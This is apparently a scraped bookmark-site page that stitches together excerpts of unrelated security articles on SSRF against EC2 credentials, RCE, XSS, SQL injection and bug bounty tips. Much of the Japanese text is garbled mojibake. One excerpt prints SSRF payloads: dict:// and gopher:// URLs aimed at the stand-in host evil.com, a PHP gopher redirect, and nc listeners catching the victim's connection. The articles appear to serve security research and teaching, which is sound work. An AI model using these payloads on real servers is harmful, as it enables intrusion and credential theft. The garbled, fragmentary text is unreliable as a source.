1. å§ãã« ããã«ã¡ã¯ãmorioka12 ã§ãã æ¬ç¨¿ã§ã¯ãAmazon EC2 ä¸ã§åã Web ã¢ããªã±ã¼ã·ã§ã³ã®èå¼±æ§ã«ãã£ã¦èå¼±æ§æ»æãå¯è½ã ã£ãå®éã®äºä¾ã«ã¤ãã¦ç´¹ä»ãã¾ãã 1. å§ãã« 2. Amazon EC2 ã«ãããã»ãã¥ãªãã£ãªã¹ã¯ Amazon EBS 被害ããã£ãå ¬éäºä¾ 3. Amazon EC2 ã§èµ·ããããèå¼±æ§æ»æ SSRF ãå¯è½ãªèå¼±æ§ SSRF ã«ãããåé¿æ¹æ³ 4. Amazon EC2 ã®èå¼±ãªå ±åäºä¾ ç»åèªã¿è¾¼ã¿æ©è½ã«æ½ã SSRF ãæªç¨ãã EC2 ã®ã¯ã¬ãã³ã·ã£ã«ã®ä¸æ£å ¥æãå¯è½ SAML ã¢ããªã±ã¼ã·ã§ã³ã«æ½ã SSRF ãæªç¨ãã EC2 ã®ã¯ã¬ãã³ã·ã£ã«ã®ä¸æ£å ¥æãå¯è½ Webhook æ©è½ã«æ½ã SSRF ãæªç¨ãã EC2 ã®ã¯ã¬ãã³ã·ã£ã«ã®ä¸æ£å ¥æãå¯è½ Webhook æ©è½ã«æ½ã SSRF ãæªç¨ãã EC2 ã®ã¯ã¬ã
ã¯ãã㫠対象ã¤ãã³ã èªã¿æ¹ã使ãæ¹ Remote Code Execution(RCE) 親ãã£ã¬ã¯ããªæå®ã«ããopen_basedirã®ãã¤ãã¹ PHP-FPMã®TCPã½ã±ããæ¥ç¶ã«ããopen_basedirã¨disable_functionsã®ãã¤ãã¹ Javaã®Runtime.execã§ã·ã§ã«ãå®è¡ Cross-Site Scripting(XSS) nginxç°å¢ã§HTTPã¹ãã¼ã¿ã¹ã³ã¼ããæä½ã§ããå ´åã«CSPãããã¼ãç¡å¹å Googleã®ClosureLibraryãµãã¿ã¤ã¶ã¼ã®XSSèå¼±æ§ Webã®Proxyæ©è½ãä»ããService Workerã®ç»é² æ¬å¼§ã使ããªãXSS /è¨å·ã使ç¨ããã«é·ç§»å URLãæå® SOME(Same Origin Method Execution)ãå©ç¨ãã¦document.writeãé 次å®è¡ SQL Injection MySQ
Hi , This book is a collection of "BugBounty" Tips tweeted / shared by community people. It includes the tweets I collected over the past from Twitter , Google and Hastags and chances that few tips may be missing. I have categorized tips against each vulnerability classification and "will be updating" regularly. Each tweet has link to original tweet to read about others replies / comments. Huge "T
ãªãã§ã³ã·ãã»ãã¥ãªãã£é¨ã®å±±å´ã§ãããµã¼ããµã¤ãã¬ã³ããªã³ã°ï¼SSRï¼ã®å°å ¥ã«ãã£ã¦SSRFãçºçããåé¡ãè¦ã¤ããæ©ä¼ããã£ããããæ¬è¨äºã§ã¯å®ä¾ã交ããªããç´¹ä»ãããã¨æãã¾ãã ãµã¼ããµã¤ãã¬ã³ããªã³ã°ï¼SSRï¼ã¨ã¯ï¼ æ¬è¨äºã§æ±ãSSRã¨ã¯ããµã¼ãä¸ã§HTMLãåºåãããã¨ããæãã¦ãã¾ãããã ãerbãjspã®ãããªãã³ãã¬ã¼ãããHTMLãåºåããã®ã¨ã¯ç°ãªããä¸è¬çã«ã¯ä»¥ä¸ã®ããã«ã¯ã©ã¤ã¢ã³ããµã¤ãã¬ã³ããªã³ã°ï¼CSRï¼ã®æèã§ä½¿ããããã¨ã主ã§ãã è¿å¹´ã®Vue.jsãReactã代表ãããããªWebããã³ãã¨ã³ããã¬ã¼ã ã¯ã¼ã¯ã¯ãã©ã¦ã¶ä¸ã§åçã«DOMããªã¼ãæ§ç¯ãã¦ç»é¢ãæç»ï¼CSRï¼ããã®ã主æµã¨ãªã£ã¦ãã¾ããããã«ãã£ã¦ãã¼ã¸é·ç§»ãæã¾ãã¦ã¼ã¶ä½é¨ã®ããã·ã³ã°ã«ãã¼ã¸ã¢ããªã±ã¼ã·ã§ã³ï¼SPAï¼ãä½ããã¨ãã§ããã¨ããã¡ãªãããããã¾ãã ãã ãåç´ãªSPAã«ã¯ãã¡
http://safebuff.com/ssrf.php?dict://attacker:11111/ evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 // http://safebuff.com/ssrf.php?url=http://evil.com/gopher.php <?php header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?> evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Conne
Hello World â¤ï¸, Facebook is the largest social networking site in the world and one of the most widely used. I have always been interested in testing the security of Facebook. During the sub domain enumeration, Iâve got a sub domain which is âhttps://m-nexus.thefacebook.com/". It redirects me to âhttps://m-nexus.thefacebook.com/servlet/mstrWebAdmin" observe below screenshot: I quickly Google keywo
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}